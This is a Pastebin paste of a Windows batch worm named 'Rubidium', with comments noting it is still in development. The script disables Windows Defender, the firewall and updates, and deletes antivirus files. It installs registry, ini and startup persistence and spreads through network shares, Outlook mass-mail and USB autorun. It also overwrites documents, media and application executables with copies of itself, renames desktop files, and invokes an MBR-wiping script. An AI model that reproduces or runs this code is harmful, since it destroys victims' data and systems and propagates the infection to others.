Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- color 17
- title Rubid1um
- cls
- echo WelkOmE to RuB1D1uM V1ruS!
- echo ===========================================
- echo Are U SurE to Run This C0mPuTEr ViRuS???
- echo RunniNg Th1s c0MputEr v1RuS mAy make Ur
- echo c0MpuTer UnUseABle!
- echo ===========================================
- CHOICE /C YN /M "Press Y for Yes, N for No."
- IF ERRORLEVEL==1 goto start
- :: oof
- :start
- :: UrMOm
- net stop "SDRSVC"
- net stop "WinDefend"
- taskkill /f /t /im "MSASCui.exe"
- net stop "security center"
- netsh firewall set opmode mode-disable
- net stop "wuauserv"
- net stop "Windows Defender Service"
- net stop "Windows Firewall"
- net stop sharedaccess
- del /Q /F C:\Program Files\alwils~1\avast4\*.*
- del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
- del /Q /F C:\Program Files\kasper~1\*.exe
- del /Q /F C:\Program Files\trojan~1\*.exe
- del /Q /F C:\Program Files\f-prot95\*.dll
- del /Q /F C:\Program Files\tbav\*.dat
- del /Q /F C:\Program Files\avpersonal\*.vdf
- del /Q /F C:\Program Files\Norton~1\*.cnt
- del /Q /F C:\Program Files\Mcafee\*.*
- del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
- del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
- del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
- del /Q /F C:\Program Files\Norton~1\*.*
- MOVE /e /y RUBIDIUM.exe C:\Windows
- XCOPY "RUBIDIUM.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
- @echo off > service.bat
- SET "NomeProcesso=RUBIDIUM.exe" >> service.bat
- SET "NomeService=RUBIDIUM" >> service.bat
- echo sc create %NomeService% binpath=%0 >> service.bat
- echo sc start %NomeService% >> service.bat
- attrib +h +r +s service.bat
- start service.bat
- SET i=0
- reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
- attrib +h +r +s %0
- :Internet
- net use Z: \\192.168.1.%i%\C$
- if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
- mountvol Z: /d)
- if %i% == 256 (goto Infect) else (set /a i=i+1)
- goto worm
- goto Internet
- :Infect
- for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.exe)
- for /f %%f in ('dir C:\Users\*.exe /s /b') do (copy %0 %%f)
- goto Infect
- :worm
- set Slash=\
- if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
- del %SystemDrive%%Slash%AUTOEXEC.BAT
- copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
- attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
- )
- set a=RUBIDIUM
- copy %0 %windir%\%a%.exe
- reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
- set b=RUBIDIUM
- copy %0 %windir%\%b%.exe
- echo [windows] >> %windir%\win.ini
- echo run=%windir%\%b%.exe >> %windir%\win.ini
- echo load=%windir%\%b%.exe >> %windir%\win.ini
- echo [boot] >> %windir%\system.ini
- echo shell=explorer.exe %b%.exe >> %windir%\system.ini
- echo dim x>>%SystemDrive%\mail.vbs
- echo on error resume next>>%SystemDrive%\mail.vbs
- echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
- echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
- echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
- echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
- echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
- echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
- echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
- echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
- echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
- echo Set Mail=ci>>%SystemDrive%\mail.vbs
- echo"MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
- echo Mail.Subject="Cool file!!!">>%SystemDrive%\mail.vbs
- echo Mail.Body="Hey... I found this cool file on the internet... wanna see it?">>%SystemDrive%\mail.vbs
- echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
- echo Mail.send>>%SystemDrive%\mail.vbs
- echo Next>>%SystemDrive%\mail.vbs
- echo ol.Quit>>%SystemDrive%\mail.vbs
- start "" "%SystemDrive%\mail.vbs"
- goto run2
- goto worm
- :run2
- set Slash=\
- if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
- attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
- del %SystemDrive%%Slash%AUTOEXEC.BAT
- copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
- attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
- )
- set a=RUBIDIUM
- copy %0 %windir%\%a%.exe
- reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
- copy %0 "%userprofile%\Start Menu\Programs\Startup"
- set b=RUBIDIUM
- copy %0 %windir%\%b%.exe
- echo [windows] >> %windir%\win.ini
- echo run=%windir%\%b%.exe >> %windir%\win.ini
- echo load=%windir%\%b%.exe >> %windir%\win.ini
- echo [boot] >> %windir%\system.ini
- echo shell=explorer.exe %b%.exe >> %windir%\system.ini
- ::infmaking
- echo [autorun] > windows.inf
- echo ;open=Worst.exe >> windows.inf
- echo ShellExecute=Worst.exe >> windows.inf
- echo UseAutoPlay=1 >> windows.inf
- :: Copy windows.inf to USB
- xcopy /e /y windows.inf D:\
- xcopy /e /y windows.inf E:\
- xcopy /e /y windows.inf F:\
- xcopy /e /y windows.inf G:\
- xcopy /e /y windows.inf H:\
- xcopy /e /y Worst.exe D:\
- xcopy /e /y Worst.exe E:\
- xcopy /e /y Worst.exe F:\
- xcopy /e /y Worst.exe G:\
- xcopy /e /y Worst.exe H:\
- assoc .lnk=batfile
- DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt
- echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k"
- assoc .doc=batfile
- DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt
- echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k"
- assoc .txt=batfile
- DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt
- echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"
- assoc .pdf=batfile
- DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt
- echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k"
- assoc .xml=batfile
- DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt
- echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k"
- assoc .mp3=batfile
- DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
- echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"
- assoc .mp4=batfile
- DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
- echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k"
- assoc .png=batfile
- DIR /S/B %SystemDrive%\*.png >> InfList_png.txt
- echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k"
- :haha
- msg * "Rubidium is the chemical element with the symbol Rb and atomic number 37"
- net send * "It is a very soft, whitish-grey solid in the alkali metal group, similar to potassium and cesium"
- goto run3
- goto haha
- :run3
- tskill pbrush
- copy /y RUBIDIUM.exe C:\Windows\pbrush.exe
- tskill excel
- copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"
- tskill mspaint
- copy /y RUBIDIUM.exe "%windir%\system32\mspaint.exe"
- tskill WINWORD
- copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office16\WINWORD.EXE"
- tskill calc
- copy /y RUBIDIUM.exe "%windir%\system32\calc.exe
- tskill msaccess
- copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\MSACCESS.EXE"
- tskill iexplore
- copy /y RUBIDIUM.exe "C:\Program Files\Internet Explorer\iexplore.exe"
- tskill safari
- copy /y RUBIDIUM.exe "C:\Program Files\Safari\Safari.exe"
- :: Create a new VBS file that speaks.
- echo do > speak.vbs
- echo CreateObject(“SAPI.SpVoice”).Speak”Rubidium is the first alkali metal in the group to have a density higher than water” >> speak.vbs
- echo loop >> speak.vbs
- ::Rubidiumislittleusedoutsideresearchithasbeenusedasacomponentofphotocellstoremovetracesofoxygenfromvacuumtubesandtomaketypesofglass
- CD Desktop
- ren *.png RUBI.DIUM
- ren *.jpg RUBI.DIUM
- ren *.gif RUBI.DIUM
- ren *.docx RUBI.DIUM
- ren *.pptx RUBI.DIUM
- ren *.pdf RUBI.DIUM
- ren *.txt RUBI.DIUM
- ren *.exe RUBI.DIUM
- start /min
- Powershell.exe -executionpolicy remotesigned -File stomp-mbr.ps1
- timeout /T 10
- :sup
- cls
- color 17
- color 75
- color 85
- color 23
- color 32
- color 54
- color 45
- color 7F
- color 7E
- color 64
- color 23
- color 32
- color 54
- color 45
- color 75
- color 85
- color 23
- color 32
- color 54
- goto sup
- ERRORLEVEL should look like this
- before:
- IF ERRORLEVEL==1 goto start
- after:
- IF ERRORLEVEL==1 goto start
- becouse there is a problem with overflow
- Thank you for your comment! As the virus is in the developing process, there may be some bugs in the code
Add Comment
Please, Sign In to add comment